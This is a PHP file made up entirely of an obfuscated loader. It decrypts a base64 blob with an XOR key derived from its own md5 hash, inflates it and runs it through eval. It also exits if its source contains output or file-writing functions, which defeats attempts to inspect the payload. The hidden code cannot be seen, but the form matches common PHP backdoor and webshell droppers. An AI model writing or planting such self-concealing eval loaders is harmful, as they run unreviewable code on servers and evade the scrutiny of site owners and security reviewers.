<?php
$nzhraq="64eca87edf8dab141fcaa9e3db141d56";
$jjmgrhldw="04000454030f0f565c07005d525a060205565a57525a5c0a5307555704515705";
$alhaainwkqim="p6YgeKEHNLbH6zcq3Rx37YAjnK0jEzq4M9IJ6ZfhjxHoECuFU3fERKoXJXzgNqsszclEQOHEQXT5FSUTVvmQZRlbFGLzQvMkWeisYo1iGYt/8f4Z74eMbcDckOwPEpoxUdH3TOBVm7evO3lwzehE8Ql/v5dYQ40TU2x9TzVM9qrT+kBTUXcENKwYSyes+x0zbXAbwnWaXfmp+jo9sgXhYrFllfn2IfRbyXiehzZYFaMr8odFsh4sbgf6YwR+CVRs8cx1Qv71zzrvbR7qYI7+As4q/F7wCYcC6RVL1/64JUzk3y3Kr0l5ksHhl4zWLdTX+YdIcjSMrOI27SerB3UNBLYEjjk1tz2cJADi2/GHOWFUjJMIydtnwGjdyc8fa3AgWZl8hj5tUuCpIL8H5ur6f1V9BRGog7ovC08zM7OFPKmHrY76e/UdP8Q7grLqhoO+ZWq8BK3aH/ludtPQD/FXkKJ9bdgvDNHQczvKIphaESvtXar2HcqSkUiaZA==";
$nvvmkalbi=file_get_contents(__FILE__);
$mfkaycfy=str_replace($alhaainwkqim,"",$nvvmkalbi);
if(strpos($mfkaycfy,"ec"."ho")!==false||strpos($mfkaycfy,"pr"."int")!==false||strpos($mfkaycfy,"var_"."dump")!==false||strpos($mfkaycfy,"file_put_"."contents")!==false||strpos($mfkaycfy,"fw"."rite")!==false){die();}
$rvzecm=str_replace(array($nzhraq,$jjmgrhldw),array("SP_05364be6","KP_2ee6c1eb"),$nvvmkalbi);
$gsrjargq=md5($rvzecm);
$mxzymwrmgo=hex2bin($jjmgrhldw);
$weytzxaao="";
$cqdmuzpnggvj=strlen($gsrjargq);
for($iwbmfwrozjg=0;$iwbmfwrozjg<$cqdmuzpnggvj;$iwbmfwrozjg++){
    $weytzxaao.=chr(ord($mxzymwrmgo[$iwbmfwrozjg])^ord($gsrjargq[$iwbmfwrozjg]));
}
$dbtaxknrmyd=base64_decode($alhaainwkqim);
$zsdbes=strlen($dbtaxknrmyd);
$mojxazmfcdju="";
$hlmnkfjl=strlen($weytzxaao);
for($iwbmfwrozjg=0;$iwbmfwrozjg<$zsdbes;$iwbmfwrozjg++){
    $mojxazmfcdju.=$dbtaxknrmyd[$iwbmfwrozjg]^$weytzxaao[$iwbmfwrozjg%$hlmnkfjl];
}
$nxknftsh="gz"."in"."fl"."ate";
eval($nxknftsh($mojxazmfcdju));
